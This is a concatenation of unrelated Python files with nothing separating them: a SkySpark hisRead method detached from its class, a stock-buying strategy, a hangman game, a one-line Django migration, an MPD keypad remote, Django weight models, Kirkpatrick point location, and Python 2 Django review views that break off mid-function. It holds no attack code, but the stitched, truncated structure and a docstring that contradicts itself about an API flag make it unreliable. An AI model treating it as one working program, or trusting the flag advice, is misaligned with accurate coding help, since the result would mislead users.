    def _on_his_read(self, point, rng, callback, **kwargs):
        """
        Skyspark will not accept GET request for his_read by default
        [ref : https://project-haystack.org/forum/topic/787#c6]

        The default behavior of SkySpark is now to disallow GET requests
        non-idempotent operations. So its still allowed on certain operations
        such as about, formats, read. However as Chris said it can be toggled
        back on using Settings|API for backward compatibility. However as a
        recommendation I think we should always be using POST as a safer
        alternative.

        Using GET for ops with side-effects is against the HTTP spec. Plus it
        is an attack vector if cookies are involved. And it provides a more
        precise way to pass the request payload. Its not really from a
        theoretical perspective. But in SkySpark we allow customers to
        generate histories using their own custom functions. So from a
        security perspective we took the safest route and consider it to
        potentially have side effects.

        If your code is all using GET, then just have the customer set
        Settings|API allowGetWithSideEffects flag to false and it should all
        work.
        """
        if isinstance(rng, slice):
            str_rng = ",".join([hszinc.dump_scalar(p) for p in (rng.start, rng.stop)])
        elif not isinstance(rng, string_types):
            str_rng = hszinc.dump_scalar(rng)
        else:
            # No conversion here as this will be added to the grid as-is
            str_rng = rng

        his_grid = hszinc.Grid()
        his_grid.metadata["id"] = self._obj_to_ref(point)
        his_grid.column["id"] = {}
        his_grid.column["range"] = {}
        his_grid.append({"id": self._obj_to_ref(point), "range": str_rng})

        return self._post_grid("hisRead", his_grid, callback, **kwargs)
#A strategy that buys stocks when market is not too bad and holds stock if its price doesn't exceed the threshold.
# Module-level globals hold all strategy state; initialize() must be called
# before feeding prices to on_stock_price_change().
import decision
from collections import deque

#Constants that determines buy decision
MAX_DROP_PERCENTAGE_PER_DAY = 2
MAX_DROP_PERCENTAGE_PER_WEEK = 3
MAX_DROP_PERCENTAGE_PER_THREE_WEEK = 5

#Constants that determines sell decision
MAX_GAIN_PRECENTAGE = 10
MAX_LOSS_PERCENTAGE = 5

# Rolling window of recent prices (most recent at the right).
price_history = deque()
# Lots held: tuples of (share_count, purchase/base price, highest price seen).
share_info = deque()
# Total shares currently held.
shares = 0
# Cash on hand.
cash = 0.0


def initialize(init_cash):
    """Reset all strategy state and set the starting cash balance."""
    global price_history, share_info, shares, cash
    price_history = deque()
    share_info = deque()
    shares = 0
    cash = init_cash


def on_stock_price_change(price):
    """Process one price tick; returns a one-element list of
    (decision, share_count, price) describing the action taken.
    """
    global price_history, share_info, shares, cash
    #Make sell decision.
    # Walk every held lot once: sell half a lot on take-profit
    # (>= +MAX_GAIN_PRECENTAGE from its base price) or stop-loss
    # (<= -MAX_LOSS_PERCENTAGE from the lot's highest observed price).
    shares_to_sell = 0
    if shares > 0:
        l = len(share_info)
        while l > 0:
            share_number, base_price, highest_price = share_info.popleft()
            highest_price = max(highest_price, price)
            if price / base_price * 100 >= 100 + MAX_GAIN_PRECENTAGE or price / highest_price * 100 <= 100 - MAX_LOSS_PERCENTAGE:
                new_sell = max(1, int(share_number / 2))
                shares_to_sell = shares_to_sell + new_sell
                if share_number - new_sell > 0:
                    # Remainder of the lot is re-based at the current price.
                    share_info.append((share_number - new_sell, price, price))
            else:
                share_info.append((share_number, base_price, highest_price))
            l = l - 1
    #Make buy decision.
    # Buy only when a full window of history (15 * 7 samples — presumably
    # 7 samples/day over 3 trading weeks, TODO confirm the sampling rate)
    # shows no drop beyond the per-day/per-week/per-three-week thresholds.
    shares_to_buy = 0
    price_history.append(price)
    if len(price_history) >= 15 * 7:
        #Remove outdated price history
        if len(price_history) > 15 * 7:
            price_history.popleft();
        day_high = 0.0
        day_drop = 0.0
        week_high = 0.0
        week_drop = 0.0
        three_week_high = 0.0
        three_week_drop = 0.0
        should_buy = True
        i = 0
        for old_price in price_history:
            # Drops are measured from the running high within each window.
            if day_high > 0:
                day_drop = max(day_drop, (day_high - old_price) / day_high * 100)
            if week_high > 0:
                week_drop = max(week_drop, (week_high - old_price) / week_high * 100)
            if three_week_high > 0:
                three_week_drop = max(three_week_drop, (three_week_high - old_price) / three_week_high * 100)
            if day_drop >= MAX_DROP_PERCENTAGE_PER_DAY or week_drop >= MAX_DROP_PERCENTAGE_PER_WEEK or three_week_drop >= MAX_DROP_PERCENTAGE_PER_THREE_WEEK:
                should_buy = False
                break
            i = i + 1
            # Day window resets every 7 samples, week window every 35.
            if i%7 == 0:
                day_high = 0.0
                day_drop = 0.0
            if i%35 == 0:
                week_high = 0.0
                week_drop = 0.0
            day_high = max(day_high, old_price)
            week_high = max(week_high, old_price)
            three_week_high = max(three_week_high, old_price)
        if should_buy and cash >= price:
            # Invest roughly half of available cash in a new lot.
            shares_to_buy = max(1, int(cash/2/price))
            share_info.append((shares_to_buy, price, price))
            #We should wait for at least another week to make another purchase
            # Dropping 35 samples forces the window to refill before the next buy.
            i = 7 * 5
            while i > 0:
                price_history.popleft()
                i = i - 1
    share_change = shares_to_buy - shares_to_sell
    cash = cash - share_change * price
    shares = shares + share_change
    assert_share_integrity()
    if share_change == 0:
        return [(decision.HOLD, 0, price)]
    elif share_change > 0:
        return [(decision.BUY, share_change, price)]
    else:
        return [(decision.SELL, - share_change, price)]


def assert_share_integrity():
    """Sanity check: per-lot counts in share_info must sum to `shares`."""
    share_sum = 0
    for e in share_info:
        share_sum = share_sum + e[0]
    if share_sum != shares:
        raise Exception("Share number mismatch!")
# Hangman-style game: a wrong guess adds a piece to the "pinata" drawing;
# 8 wrong guesses lose the game.
import subprocess, os

# Loop until the player enters a purely alphabetic word.
word = '3'
while not word.isalpha():
    word = input("Enter your word of choice: ")
    if not word.isalpha():
        print("Not a valid word bud. Go ahead and try again.\n")
# Scroll the chosen word off screen (and clear on Windows; "CLS" is a
# Windows shell command and is a no-op/failure elsewhere).
print("\n" * 50)
cls = os.system("CLS")
pinataCounter = 0
won = False
lettersGuessed = []


def printPinata(n):
    # Draw the first n pieces of the pinata figure.
    print("--+ ")
    pinataArr = [' 0\n',' |\n',' /', '|', '\\\n', ' |\n', ' /',' \\\n']
    # n == 3 is special-cased because the third piece alone would leave an
    # unterminated row ('/ ' without the rest of the arms line).
    if n != 3:
        pinataStr = ''
        for i in range(0,n):
            pinataStr += pinataArr[i]
        print(pinataStr)
    else:
        print(' 0\n |\n |')


# Main game loop: one guess per iteration.
while not won and pinataCounter < 8:
    print('\n' * 3)
    # Show the word with guessed letters revealed and the rest as blanks.
    printString = ' '
    for char in word:
        printString += (char + ' ') if char in lettersGuessed else ' _ '
    print(printString)
    # Prompt until a single, new, alphabetic letter is entered.
    guessLetter = 'haha'
    while len(guessLetter)!=1 or not guessLetter.isalpha() or guessLetter in lettersGuessed:
        guessLetter = input("Enter letter." + ("Already guessed this bub: " + ((str(lettersGuessed))[1:len(str(lettersGuessed))-1] + '\n') if len(lettersGuessed)>0 else '\n'))
        if len(guessLetter) !=1 or not guessLetter.isalpha():
            print("Not a letter. Try it again.\n")
        if guessLetter in lettersGuessed:
            print("Already guessed it. Ty again")
    lettersGuessed.append(guessLetter)
    # Won once every letter of the word has been guessed.
    won = True
    for char in word:
        if not char in lettersGuessed:
            won = False
    if guessLetter in word:
        print("Yay. Correct letter!\n")
    else:
        print("Not a letter in ze word")
        pinataCounter += 1
    if won or pinataCounter >=8:
        break
    print("Your pinata status: ")
    printPinata(pinataCounter)

if won:
    print("Good job lad! You correctly got " +word +'.\n')
else:
    print("You lose. You die")
    printPinata(pinataCounter)
# Generated by Django 3.1.3 on 2020-11-22 10:44 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('library', '0015_auto_20201122_1601'), ] operations = [ migrations.AlterField( model_name='profile', name='borrow_date', field=models.CharField(blank=True, default=0, max_length=50, null=True), ), migrations.AlterField( model_name='profile', name='return_date', field=models.CharField(blank=True, default=0, max_length=50, null=True), ), migrations.AlterField( model_name='records', name='return_date', field=models.CharField(default='None', max_length=50), ), ]
# Numeric-keypad remote control for an MPD music player: each keypad key is
# mapped to an ``mpc`` command (queue a genre folder, play/pause, skip, volume).
import subprocess

from evdev import InputDevice, ecodes

# mpc command lines, pre-split into argv lists for subprocess.call.
mpc_status = "mpc status".split()
mpc_random = "mpc random on".split()
mpc_clear = "mpc crop".split()          # "crop" keeps only the current song
mpc_FUNK = "mpc add FUNK/".split()
mpc_JAZZ = "mpc add JAZZ/".split()
mpc_ROCK = "mpc add ROCK/".split()
mpc_ROCK_NOUV = "mpc add ROCK_NOUV/".split()
mpc_Play = "mpc play".split()
mpc_Pause = "mpc pause".split()
mpc_next = "mpc next".split()
mpc_prev = "mpc prev".split()
mpc_volUp = "mpc volume +5".split()
mpc_volDown = "mpc volume -5".split()

device = InputDevice("/dev/input/event17")  # to be changed later (hard-coded device node)

subprocess.call(mpc_random)

for event in device.read_loop():
    if event.type == ecodes.EV_KEY:
        # NOTE(review): except for the play/pause branch, these branches do not
        # check event.value, so with evdev they fire on key press, auto-repeat
        # AND release — a single keystroke can trigger the command several
        # times.  Confirm this is intended.
        # Playlist launchers: crop the queue, add the genre folder, start playing.
        # FUNK KEY_NUMLOCK
        if event.code == 69:
            subprocess.call(mpc_clear)
            subprocess.call(mpc_FUNK)
            subprocess.call(mpc_Play)
        # JAZZ KEY_KPSLASH
        elif event.code == 98:
            subprocess.call(mpc_clear)
            subprocess.call(mpc_JAZZ)
            subprocess.call(mpc_Play)
        # ROCK KEY_KPASTERISK
        elif event.code == 55:
            subprocess.call(mpc_clear)
            subprocess.call(mpc_ROCK)
            subprocess.call(mpc_Play)
        # ROCK_NOUV KEY_KPMINUS
        elif event.code == 74:
            subprocess.call(mpc_clear)
            subprocess.call(mpc_ROCK_NOUV)
            subprocess.call(mpc_Play)
        # Useful shortcuts
        # Play/Pause KEY.KP5
        elif event.code == 76:
            status_output = subprocess.check_output(mpc_status)
            # evdev key events report value 1 for press and 2 for auto-repeat,
            # so "!= 1 and != 2" makes the toggle act only on key release.
            if "[playing]" in status_output.decode() and event.value != 1 and event.value != 2:
                subprocess.call(mpc_Pause)
            elif event.value != 1 and event.value != 2:
                subprocess.call(mpc_Play)
        # Next KEY_KP6
        elif event.code == 77:
            subprocess.call(mpc_next)
        # Previous KEY_KP4
        elif event.code == 75:
            subprocess.call(mpc_prev)
        # Volume UP KEY_KP8
        elif event.code == 72:
            subprocess.call(mpc_volUp)
        # Volume DOWN KEY_KP2
        elif event.code == 80:
            subprocess.call(mpc_volDown)
# coding: utf-8
from django.db import models
from django.utils.translation import ugettext_lazy as _


class WeightedModel(models.Model):
    """Abstract model with a weight; items with the lowest weights surface first."""
    # Constants
    # BUG FIX: this was a generator expression.  Django iterates ``choices``
    # every time it validates or renders the field, and a generator is
    # exhausted after the first pass — leaving the choices silently empty
    # afterwards.  A tuple can be iterated any number of times.
    WEIGHTS = tuple((x, x) for x in range(0, 100))

    # Fields
    weight = models.SmallIntegerField(db_index=True, null=False, choices=WEIGHTS, default=10,
                                      help_text=_("Items with lower weights come first"),
                                      verbose_name=_("Weight"))

    # Metadata
    class Meta:
        abstract = True


class PriorityModel(models.Model):
    """Abstract model with a priority; higher priorities come first."""
    # Constants
    # BUG FIX: tuple instead of a one-shot generator (see WeightedModel.WEIGHTS).
    WEIGHTS = tuple((x, x) for x in range(0, 100))

    # Fields
    weight = models.SmallIntegerField(db_index=True, null=False, choices=WEIGHTS, default=10,
                                      help_text=_("Items with lower weights have lower priority"),
                                      verbose_name=_("Weight"))

    # Setters
    def increase_priority(self, save=True, amount=1):
        """Increase the object's priority by *amount*; persist when *save* is True."""
        self.weight += amount
        if save is True:
            self.save(update_fields=['weight'])

    def decrease_priority(self, save=True, amount=1):
        """Decrease the object's priority by *amount*; persist when *save* is True."""
        self.increase_priority(save=save, amount=-amount)

    # Metadata
    class Meta:
        abstract = True
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import division from __future__ import unicode_literals #from __future__ import print_function #from __future__ import absolute_import __author__ = 'Marco Antonio Pinto-Orellan' from pypro import * if __name__ == "__main__": CommonProject().main()
"""Kirkpatrick's point-location data structure over a planar subdivision.

Preprocesses a polygon tiling into a DAG of triangle layers so that a point
can be located in the original tiling in O(log n) time using O(n) space.
"""
from collections import defaultdict
import logging
from matplotlib import pyplot as plt
import numpy as np
import time
from networkx import DiGraph, Graph
import networkx as nx
from typing import List, Tuple, Optional

import drawing
from hull import quickhull
from independentset import planar_independent_set
from polygons import Point, Polygon, Triangle
# NOTE(review): generate_random_tiling is imported but never used below.
from polygons import generate_random_tiling, generate_triangle_tiling
from triangulate import triangulate


def wrap_triangle(poly: Polygon) -> Tuple[Triangle, List[Triangle]]:
    """
    Finds a large triangle that surrounds the polygon, and tiles the gap
    between the triangle and the polygon.
    :param poly: polygon to be surrounded
    :return: tuple of the bounding triangle and the triangles in the gap
    """
    bounding_triangle = Triangle.enclosing_triangle(poly)
    # We need to expand the triangle a little bit so that the polygon side isn't on top of
    # one of the triangle sides (otherwise Triangle library segfaults).
    bounding_triangle = bounding_triangle.scale(1.1)
    # bounding_region = bounding_triangle.triangulate(hole=poly)
    bounding_region = triangulate(bounding_triangle, hole=poly)
    return bounding_triangle, bounding_region


def triangle_graph(regions: List[Polygon], graph: Graph) -> List[Triangle]:
    """
    Triangulate regions, connecting into a tree (acyclic digraph) for lookups from
    triangles to the original polygon tiling.
    :param regions: list of regions to be triangulated
    :param graph: graph to be populated with edge from the original polygons to the
        triangles in their triangulations.
    :return: list of all triangles in all regions
    """
    logging.debug("Triangulating subdivision of %d regions" % len(regions))
    triangles = []
    for i, region in enumerate(regions):
        logging.debug("Triangulating region %d" % i)
        logging.getLogger().handlers[0].flush()
        # Original polygons are tagged so locate() can tell them apart from
        # the synthetic triangles produced during preprocessing.
        graph.add_node(region, original=True)
        if isinstance(region, Triangle):
            triangles.append(region)
        elif region.n == 3:
            # Three-sided Polygon: reinterpret it in place as a Triangle.
            region.__class__ = Triangle
            triangles.append(region)
        else:
            # triangulation = region.triangulate()
            triangulation = triangulate(region)
            for triangle in triangulation:
                graph.add_node(triangle, original=False)
                graph.add_edge(triangle, region)
                triangles.append(triangle)
    return triangles


def remove_point_triangulation(affected_triangles: List[Triangle], p: Point) -> Polygon:
    """
    Removes a point from affected triangles, return the resulting polygon that fills
    the gap.
    :param affected_triangles: list of the triangles containing the point to be removed
    :param p: point to be removed
    :return: polygon created by merging the affected triangles
    """
    # First we construct a dictionary that tells us adjacency of triangles
    boundaries = [set(tri.pts) for tri in affected_triangles]
    point2triangles = defaultdict(set)
    for i, bound in enumerate(boundaries):
        bound.remove(p)
        # Each triangle containing p has exactly two remaining vertices.
        u, v = bound
        point2triangles[u].add(i)
        point2triangles[v].add(i)
    # Connect adjacent triangles, noting which point connects them
    # NOTE(review): the ``(i, j)`` unpacking assumes every boundary vertex is
    # shared by exactly two of the affected triangles; it raises if the set
    # has a different size — confirm the tiling guarantees this.
    graph = Graph()
    for u, (i, j) in point2triangles.items():
        graph.add_edge(i, j, point=u)
    # Walk around the triangles to get the new outer boundary
    # TODO: Remember to make this work. DFS visits all nodes not all edges. I think find_cycle works.
    new_boundary = [
        graph.get_edge_data(i, j)["point"]
        for (i, j) in nx.find_cycle(graph)
        # for (i, j) in nx.dfs_edges(graph)
    ]
    return Polygon(new_boundary)


def next_layer(regions: List[Triangle], boundary: Triangle, digraph: DiGraph) -> List[Triangle]:
    """
    Compute the next layer in the data structure by removing O(n) points, retriangulating,
    connecting new triangles in DAG to triangles with which they might overlap. We don't
    compute actual intersections to save time.
    :param regions: the current layer in the algorithm
    :param boundary: the bounding triangle (so that the boundary is never removed)
    :param digraph: digraph search tree for later location
    :return: list of triangles in the next layer
    """
    # Since a tiling is represented as list of polygons, points may
    # appear multiple times in the tiling. We produce a mapping to
    # bring all information together
    point2regions = defaultdict(set)
    for i, region in enumerate(regions):
        for point in region.pts:
            point2regions[point].add(i)

    # Graph on the vertices of the tiling
    graph = Graph()
    for region in regions:
        # zip with np.roll pairs each vertex with its predecessor, i.e. the
        # polygon's edges.
        for u, v in zip(region.pts, np.roll(region.pts, 1)):
            graph.add_edge(u, v)

    # Find independent set to remove constant fraction of triangles
    ind_set = planar_independent_set(graph, black_list=boundary.pts)

    # Find the affected regions to be joined together, triangulate, and connect into DAG
    unaffected = set(range(len(regions)))
    new_regions = list()
    for point in ind_set:
        # Remove point and join triangles.
        affected_ixs = point2regions[point]
        unaffected.difference_update(affected_ixs)
        affected = [regions[i] for i in affected_ixs]
        new_poly = remove_point_triangulation(affected, point)

        # Retriangulate
        # new_triangles = new_poly.triangulate()
        new_triangles = triangulate(new_poly)
        new_regions += new_triangles

        # Connect into DAG for lookups
        for tri in new_triangles:
            for ix in affected_ixs:
                digraph.add_node(tri, original=False)
                digraph.add_edge(tri, regions[ix])
    # Triangles untouched by the removed points survive into the next layer.
    new_regions += [regions[i] for i in unaffected]
    return new_regions


class Kirkpatrick:
    """
    Implementation of Kirkpatrick's algorithm. When passed a tiling of polygons, it
    processes it to produce a search tree. After preprocessing, location takes O(log n)
    time, and the object uses O(n) space.
    The plot_layers parameter will produce png files of the layers the algorithm produces
    during preprocessing. Note: this takes a while.
    """
    def __init__(self, subdivision: List[Polygon], plot_layers=False):
        """ Create a point locator object on a planar subdivision """
        self.digraph = DiGraph()
        self.top_layer = list()
        self._preprocess(subdivision, plot_layers=plot_layers)

    def _preprocess(self, subdivision: List[Polygon], plot_layers=False):
        """
        If subdivision is not triangular, then triangulate each non-triangle region.
        Then place large triangle around region, and triangulate
        :param subdivision: list of polygons tiling the plane
        """
        logging.debug("Preprocessing planar subdivision")
        subdivision = triangle_graph(subdivision, self.digraph)
        logging.debug("Received triangulated subdivision")
        logging.debug("Constructing convex hull")
        all_pts = {p for tri in subdivision for p in tri.pts}
        hull = quickhull(list(all_pts))
        hull = Polygon(hull)
        logging.debug("Wrapping polygon in bounding triangle")
        bounding_tri, gap_triangles = wrap_triangle(hull)
        for tri in gap_triangles:
            self.digraph.add_node(tri, original=False)
        layer = subdivision + gap_triangles
        if plot_layers:
            drawing.plot_polygons(layer, 'k-')
            plt.savefig("layer0.png")
            plt.clf()
        logging.debug("Iterating over layers")
        i = 0
        # Each next_layer() call removes an independent set of points, so the
        # layer shrinks geometrically until only the bounding triangle remains.
        while len(layer) > 1:
            logging.debug("Current layer size: %d" % len(layer))
            layer = next_layer(layer, bounding_tri, self.digraph)
            i += 1
            if plot_layers:
                drawing.plot_polygons(layer, 'k-')
                plt.savefig("layer%d.png" % i)
                plt.clf()
        logging.debug("Final layer size: %d" % len(layer))
        self.top_layer = layer

    def locate(self, p: Point, plot_search=False) -> Optional[Polygon]:
        """
        Locates a point in the original tiling in O(log n) time.
        :param p: point to be located
        :param plot_search: plots the tiles it searchs on the way
        :return: either the original polygon, or None if outside the tiling
        """
        curr = None
        for region in self.top_layer:
            if p in region:
                curr = region
                break
        else:
            # for/else: no top-layer triangle contains p.
            return None
        # Iterate until the layer of triangles immediately above the original tiling
        # This is because it is easy to test point containment in a triangle, not easy in general polygons.
        # NOTE(review): DiGraph.neighbors returns a list only in networkx 1.x;
        # under networkx >= 2.0 it is an iterator and the len()/indexing calls
        # below raise TypeError.  Likewise ``self.digraph.node`` was removed in
        # networkx 2.4 (use ``.nodes``).  Confirm the pinned networkx version.
        if plot_search:
            drawing.plot_point(p)
            drawing.plot_polygon(curr, 'r-')
            plt.savefig("search_layer0.png")
            plt.clf()
        i = 1
        while len(self.digraph.neighbors(curr)) > 1:
            for node in self.digraph.neighbors(curr):
                if p in node:
                    curr = node
                    break
            else:
                return None
            if plot_search:
                drawing.plot_point(p)
                highlights = list()
                for node in self.digraph.neighbors(curr):
                    drawing.plot_polygon(node, 'k-')
                    if node.n == 3 and p in node:
                        highlights.append(node)
                drawing.plot_polygons(highlights, 'r-')
                plt.savefig('search_layer%d.png' % i)
                plt.clf()
                i += 1
        # Access the original tile just below the polygon if it exists
        neighbors = self.digraph.neighbors(curr)
        if len(neighbors) == 1:
            curr = neighbors[0]
        if self.digraph.node[curr]["original"]:
            return curr
        return None


def time_tests(min_pts: int=10, max_pts: int=100, inc=5, n_iter=100) -> List[Point]:
    """
    Executes an intensive test of the algorithm. Generates many tilings of different
    numbers of points, and generates many query points to test.
    :param min_pts: mininum number of points in tiling
    :param max_pts: maximum number of points in tiling
    :param inc: generate tilings every inc points from min to max
    :param n_iter: number of query points to test
    :return: List of points of (num_tiles, time for a query)
    """
    logging.info("Running timing tests on point location")
    size = 100000
    data = list()
    for i in range(min_pts, max_pts, inc):
        logging.info("Performing tests on %d points" % i)
        tiles = generate_triangle_tiling(num_pts=i, size=size)
        locator = Kirkpatrick(tiles)
        for j in range(n_iter):
            query = Point.sample_square(size)
            start = time.time()
            locator.locate(query)
            elapsed = time.time() - start
            # (x, y) = (tiling size, seconds per query) — Point reused as a pair.
            data.append(Point(len(tiles), elapsed))
    return data


if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    # Smoke test: locate a point inside a single square tile.
    tiles = [
        Polygon([
            Point(0, 0),
            Point(2, 0),
            Point(2, 2),
            Point(0, 2)
        ])
    ]
    locator = Kirkpatrick(tiles)
    query_point = Point(1, 1)
    located_tile = locator.locate(query_point, plot_search=True)
    print(located_tile)
# Review/rating views for entities (teachers and universities): listing,
# voting, writing and deleting reviews, plus user registration.
from django.shortcuts import render, get_object_or_404, get_list_or_404
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.core.urlresolvers import reverse
from models import MyUser, Tag, Entity, Review, Vote, Criteria_Teacher, Criteria_Uni
from collections import defaultdict
from django.core.exceptions import ObjectDoesNotExist
import traceback

# NOTE(review): Python 2 / legacy Django code (print statements,
# django.core.urlresolvers, implicit-relative ``from models import ...``).


def test_tag(request):
    """Debug view: render every Tag as a plain dict."""
    tag_list = Tag.objects.all().values()
    return render(request, 'test_tag.html', {'tag_list' : tag_list})


def test_entity(request, entity_id):
    """Debug view: render a single Entity by id (404 on a non-numeric id)."""
    try:
        entity_id = int(entity_id)
    except ValueError:
        raise Http404()
    print "Fetching Info for Entity", entity_id
    entity_info = Entity.objects.get(id=entity_id)
    print entity_info
    return render(request, 'test_entity.html', {'entity_info' : entity_info})


def merge_dict(obj, new_dict):
    """Copy every key/value of new_dict onto obj as attributes; return obj."""
    # merge django-orm class models with new dictionary
    for key, value in new_dict.items():
        setattr(obj, key, value)
    return obj


def calculate_overall(review_list, review_length):
    """Average the five rating columns over review_list; zeros when empty."""
    # Calculate the overall rating of an entity, supplied by review_list
    # Currently very ugly, will try to re-model later
    if review_length == 0:
        return [0.0, 0.0, 0.0, 0.0, 0.0]
    s = [0.0, 0.0, 0.0, 0.0, 0.0]
    for item in review_list:
        s[0] += item.rating_1
        s[1] += item.rating_2
        s[2] += item.rating_3
        s[3] += item.rating_4
        s[4] += item.rating_5
    s = [(item/review_length) for item in s]
    return s


def get_criteria_list(is_teacher):
    # return the list of criteria depending whether entity is teacher or uni
    if is_teacher:
        return get_list_or_404(Criteria_Teacher)
    else:
        return get_list_or_404(Criteria_Uni)


def add_vote_info(review_list):
    """Annotate each review with vote_up / vote_total / vote_percent counts."""
    # add vote_up, vote_total, vote_percentage to each review
    for each_review in review_list:
        new_dict = {}
        up = Vote.objects.filter(vote_review__id=each_review.id, vote_value=True).count()
        down = Vote.objects.filter(vote_review__id=each_review.id, vote_value=False).count()
        if (up+down) == 0:
            percent = 0
        else:
            percent = int(100.0 * up / float(up+down))
        new_dict["vote_up"] = up
        new_dict["vote_total"] = up + down
        new_dict["vote_percent"] = percent
        each_review = merge_dict(each_review, new_dict)
    return review_list


def convert_rating_single(avg_score):
    """Split a score into full/half star parts for display."""
    # 3.5 -> (3,1) ; 3.0 -> (3,0); 3.9 -> (3,1)
    d = {}
    d["score_real"] = avg_score
    z = int(avg_score)
    d["score_full"] = z
    # Any fractional remainder shows as a single "half" star.
    if (avg_score-z) > 0.0:
        d["score_half"] = 1
    else:
        d["score_half"] = 0
    return d


def faster_convert(each_score, criteria_name):
    """convert_rating_single plus the criteria name, for use in templates."""
    d = convert_rating_single(each_score)
    d["name"] = criteria_name
    return d


def convert_rating_many(score_list, criteria_list):
    """Pair each score with its criteria (matched positionally by index)."""
    res = [faster_convert(each_score, criteria_list[idx]) for idx, each_score in enumerate(score_list)]
    return res


def add_rating_info(review_list, criteria_list):
    """Attach a per-criteria star breakdown (``.rating``) to every review."""
    for each_review in review_list:
        score_list = [each_review.rating_1, each_review.rating_2, each_review.rating_3, each_review.rating_4, each_review.rating_5]
        rating_list = convert_rating_many(score_list, criteria_list)
        each_review.rating = rating_list
    return review_list


def add_tag_info(review_list, tag_list):
    """Attach tag objects to each review and return the five most used tags."""
    tag_count = defaultdict(int)
    for each_review in review_list:
        review_tag_list = [each_review.tag_1, each_review.tag_2, each_review.tag_3, each_review.tag_4, each_review.tag_5]
        print review_tag_list
        review_tag_list = [item.id for item in review_tag_list if item]
        print review_tag_list
        # NOTE(review): ``tag_list[item-1]`` assumes Tag ids are contiguous and
        # start at 1, matching the ordering of tag_list — confirm.
        review_tag_list = [tag_list[item-1] for item in review_tag_list]
        print review_tag_list
        each_review.tag_list = review_tag_list
        for item in review_tag_list:
            tag_count[item] += 1
    tag_list_with_count = tag_count.items()
    print tag_list_with_count
    # Sort by descending usage count; keep the top five.
    tag_list_with_count = sorted(tag_list_with_count, key=lambda item: -item[1])
    print tag_list_with_count
    return (review_list, tag_list_with_count[:5])


def add_my_vote_info(review_list, my_vote_list):
    """Mark reviews the current user has voted on (have_own_vote / own_vote)."""
    if not my_vote_list:
        return review_list
    for each_review in review_list:
        for vote_info in my_vote_list:
            # vote_info is a (vote_review_id, vote_value) pair.
            if vote_info[0] == each_review.id:
                each_review.have_own_vote = True
                each_review.own_vote = vote_info[1]
                break
    return review_list


def show_entity(request, entity_id):
    """Main entity page: reviews, aggregate ratings, top tags, own-review state."""
    print "Fetch entity", entity_id
    entity_info = get_object_or_404(Entity, pk=entity_id)
    tag_list = get_list_or_404(Tag)
    print "Fetch tag"
    print tag_list
    #review_list = get_list_or_404(Review, entity__id=entity_id)
    review_list = Review.objects.filter(entity__id=entity_id)
    review_list = add_vote_info(review_list)
    print "Review List"
    print review_list
    entity_info.review_count = len(review_list)
    entity_score = calculate_overall(review_list, len(review_list))
    entity_avg_score = sum(entity_score) / len(entity_score)
    entity_info = merge_dict(entity_info, convert_rating_single(entity_avg_score))
    print 'Entity rating', entity_score
    print 'Entity Avg', entity_avg_score
    criteria_list = get_criteria_list(entity_info.is_teacher)
    print 'Criteria List', criteria_list
    entity_criteria = convert_rating_many(entity_score, criteria_list)
    review_list = add_rating_info(review_list, criteria_list)
    # TODO: sort review list
    (review_list, entity_best_tag) = add_tag_info(review_list, tag_list)
    print 'Best tag', entity_best_tag
    ##### registered user section
    # add own vote details, add own_review if exists
    have_own_review = False
    own_review_id = None
    if request.user.is_authenticated():
        print "Logged in user", request.user.myuser.pk
        my_vote_list = Vote.objects.filter(vote_user__id=request.user.myuser.pk).values_list('vote_review_id', 'vote_value')
        print my_vote_list
        review_list = add_my_vote_info(review_list, my_vote_list)
        try:
            own_review = Review.objects.get(author_id=request.user.myuser.pk, entity_id=entity_id)
            print "Own Review exists"
            have_own_review = True
            own_review_id = own_review.id
        except ObjectDoesNotExist:
            print "No existing review"
    ##########################
    return render(request, 'entity_guest.html', {
        'entity_info': entity_info,
        'review_list' : review_list,
        'entity_criteria' : entity_criteria,
        'entity_best_tag' : entity_best_tag,
        'have_own_review' : have_own_review,
        'own_review_id' : own_review_id,
    })


def change_vote(request, review_id, vote_value):
    """AJAX endpoint: create, update or delete the user's vote on a review."""
    # vote_value = 0(false), 1(true), 2(cancel)
    # check user logged in, user own this vote
    # NOTE(review): ``valid_vote`` is never used — vote_value is not actually
    # validated against it.
    valid_vote = [0, 1, 2]
    try:
        vote_value = int(vote_value)
        review_id = int(review_id)
        print request.path, request.user.id, request.user.myuser.id
        print "Receive ajax", review_id, vote_value
        if request.user.is_authenticated():
            if vote_value == 2:
                print "Delete vote"
                target_vote = get_object_or_404(Vote, vote_user_id=request.user.myuser.id, vote_review_id=review_id)
                target_vote.delete()
            else:
                try:
                    target_vote = Vote.objects.get(vote_user__id=request.user.myuser.id, vote_review__id=review_id)
                    target_vote.vote_value = vote_value
                    target_vote.save()
                    print "Update vote"
                except ObjectDoesNotExist:
                    print "Create vote"
                    target_vote = Vote.objects.create(vote_user_id=request.user.myuser.id, vote_review_id=review_id, vote_value=vote_value)
    except Exception, e:
        # NOTE(review): the second positional argument of HttpResponse is
        # content_type; passing request.path there looks unintended — confirm.
        return HttpResponse("Error AJAX", request.path)
    return HttpResponse("OK")


def write_review(request, entity_id):
    """GET: show the review form (pre-filled in edit mode).
    POST: validate and create/update the user's review, then redirect."""
    if not request.user.is_authenticated():
        return HttpResponseRedirect(reverse(('show_entity'), args=(entity_id,)))
    if request.method == 'GET':
        entity_info = get_object_or_404(Entity, pk=entity_id)
        criteria_list = get_criteria_list(entity_info.is_teacher)
        tag_list = get_list_or_404(Tag)
        # check if the user already have a review?, edit mode
        # very ugly code, i know
        try:
            my_review = Review.objects.get(author_id=request.user.myuser.pk, entity_id=entity_id)
            print "Review already existed, proceed to fetch"
            # Rebuild the "tag<N>" checkbox names the template expects.
            selected_tag_list = []
            if my_review.tag_1:
                selected_tag_list.append(''.join(['tag', str(my_review.tag_1.id)]))
            if my_review.tag_2:
                selected_tag_list.append(''.join(['tag', str(my_review.tag_2.id)]))
            if my_review.tag_3:
                selected_tag_list.append(''.join(['tag', str(my_review.tag_3.id)]))
            if my_review.tag_4:
                selected_tag_list.append(''.join(['tag', str(my_review.tag_4.id)]))
            if my_review.tag_5:
                selected_tag_list.append(''.join(['tag', str(my_review.tag_5.id)]))
            return render(request, 'write_review.html', {
                'entity_info' : entity_info,
                'criteria_list' : criteria_list,
                'tag_list' : tag_list,
                'title' : my_review.title,
                'content' : my_review.content,
                'rating1': my_review.rating_1,
                'rating2': my_review.rating_2,
                'rating3': my_review.rating_3,
